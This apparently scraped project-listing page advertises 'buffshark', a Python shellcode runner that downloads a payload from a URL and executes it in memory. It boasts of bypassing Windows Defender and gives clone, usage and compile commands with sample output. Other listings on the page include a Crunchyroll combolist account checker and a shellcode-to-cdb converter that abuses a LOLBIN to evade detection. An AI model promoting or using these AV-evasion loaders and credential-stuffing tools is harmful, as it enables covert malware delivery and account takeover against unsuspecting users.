Shellcode runner to execute malicious payload and bypass AV

Related tags

Command-line Toolsbuffshark-shellcode-runner
Overview

buffshark-shellcode-runner

Python Shellcode Runner to execute malicious payload and bypass AV

This script utilizes mmap(for linux) and win api wrappers (for windows) to execute shellcode in memory and bypass Windows Defender.

Installation and Compiling

  1. Download the repo: git clone https://github.com/momo1239/buffshark-shellcode-runner
  2. Move directory: cd buffshark-shellcode-runner/
└─# python3 buffshark.py -h                                       
==========================
Buff Shark Shellcode Runner
 Author: Momo Nguyen 
==========================
usage: buffshark.py [-h] -u  -a

Python Shellcode Runner

optional arguments:
  -h, --help            show this help message and exit
  -u , --url            URL to raw shellcode file
  -a , --architecture   Choose OS
  1. Optional: Install pyinstaller to compile to windows executable: pip install pyinstaller
  2. Optional: Compile: pyinstaller -F buffshark.py

Usage

Example: python3 buffshark.py -u http://127.0.0.1:8080/shellcode.bin -a [win/nix]

==========================
Buff Shark Shellcode Runner
 Author: Momo Nguyen 
==========================
[+] Downloading shellcode...
[+] 49 Bytes Downloaded!
[+] Running shellcode in memory...
README.md  antiscan.PNG  antiscanres.PNG  buffshark.exe  buffshark.py  shell.bin  shellcode

AV Scan

As of 11/22/2021, Windows Defender does not flag this shellcode runner.

1/26 AV has flagged buffshark on antiscan.me

image

image

Owner
Momo Lenard
Trying to do cyber things
Momo Lenard
GitHub Repository
CLI based Crunchyroll Account Checker Proxyless written in python from scratch.

A tool for checking Combolist of Crunchyroll accounts without proxies, It is written in Python from Scratch ,i.e, no external module is used rather than inbuilt Python modules.

Abhijeet 8 Dec 13, 2022
A python Ethereum utilities command-line tool.

peth-cli A python Ethereum utilities command-line tool. After wasting the all day trying to install seth and failed, I took another day to write this.

Moon 55 Nov 15, 2022
Library and command-line utility for rendering projects templates.

A library for rendering project templates. Works with local paths and git URLs. Your project can include any file and Copier can dynamically replace v

808 Jan 04, 2023
A command-line utility that creates projects from cookiecutters (project templates), e.g. Python package projects, VueJS projects.

Cookiecutter A command-line utility that creates projects from cookiecutters (project templates), e.g. creating a Python package project from a Python

18.6k Dec 30, 2022
A simple CLI application helps you to find giant files that are eating up your system storage

Large file finder Sometimes it's very hard to find if some giant files are eating up your system storage. We might need to hunt those down. This simpl

Rahul Baruri 5 Nov 18, 2022
Ros command - Unifying the ROS command line tools

Unifying the ROS command line tools One impairment to ROS 2 adoption is that all

37 Dec 15, 2022
Open-Source Python CLI package for copying DynamoDB tables and items in parallel batch processing + query natural & Global Secondary Indexes (GSIs)

Python Command-Line Interface Package to copy Dynamodb data in parallel batch processing + query natural & Global Secondary Indexes (GSIs).

1 Oct 31, 2021
A mini command line tool to spellcheck text files using tadqeek.alsharekh.org

tadqeek_sakhr A mini command line tool to spellcheck text files using tadqeek.alsharekh.org Usage usage: python tadqeek_sakhr.py [-h] -i INPUT [-o OUT

Youssif Shaaban Alsager 5 Dec 11, 2022
A dec-bin converter uses 2's complement.

2's Complement Dec-Bin Converter A dec-bin converter uses 2's complement. Visit my Medium Post. What is 2's complement? Two's complement is the most c

Khaw Chi Hun (Jacky) 9 Mar 01, 2022
Interactive Redis: A Terminal Client for Redis with AutoCompletion and Syntax Highlighting.

Interactive Redis: A Cli for Redis with AutoCompletion and Syntax Highlighting. IRedis is a terminal client for redis with auto-completion and syntax

2.2k Dec 29, 2022
Custom function scheduler TUI (text-based user interface) in the console

Custom function scheduler TUI (text-based user interface) in the console

Luke 1 Oct 26, 2022
Convert shellcode generated using pe_2_shellcode to cdb format.

pe2shc-to-cdb This tool will convert shellcode generated using pe_to_shellcode to cdb format. Cdb.exe is a LOLBIN which can help evade detection & app

mrd0x 75 Jan 05, 2023
A dec-bin converter uses 2's complement.

2's Complement Dec-Bin Converter A dec-bin converter uses 2's complement. Visit my Medium Post. What is 2's complement? Two's complement is the most c

C.H Jacky 9 Mar 01, 2022
Powerful yet easy command line calculator.

Powerful yet easy command line calculator.

Cruisen 1 Jul 22, 2022
grungegirl is the hacker's drug encyclopedia. programmed in python for maximum modularity and ease of configuration.

grungegirl. cli-based drug search for girls. welcome. grungegirl is aiming to be the premier drug culture application. it is the hacker's encyclopedia

Eristava 10 Oct 02, 2022
Fylm is a wonderful automated command line app for organizing your film media.

Overview Fylm is a wonderful automated command line app for organizing your film media. You can pronounce it Film or File 'em, whichever you like! It

Brandon Shelley 30 Dec 05, 2022
Python3 command-line tool for the inference of Boolean rules and pathway analysis on omics data

BONITA-Python3 BONITA was originally written in Python 2 and tested with Python 2-compatible packages. This version of the packages ports BONITA to Py

1 Dec 22, 2021
Rich is a Python library for rich text and beautiful formatting in the terminal.

The Rich API makes it easy to add color and style to terminal output. Rich can also render pretty tables, progress bars, markdown, syntax highlighted source code, tracebacks, and more — out of the bo

Will McGugan 41.4k Jan 03, 2023
A Yahtzee-solving python package and command line tool.

yahtzee A Yahtzee-solving python package and command line tool. The algorithm is mathematically guaranteed to have the best strategy. That is, it maxi

David Merrell 0 Aug 19, 2022
Regis-ltmpt-auto - Program register ltmpt 2022 automatis

LTMPT Register Otomatis 2022 Program register ltmpt 2022 automatis dibuat untuk

1 Jan 13, 2022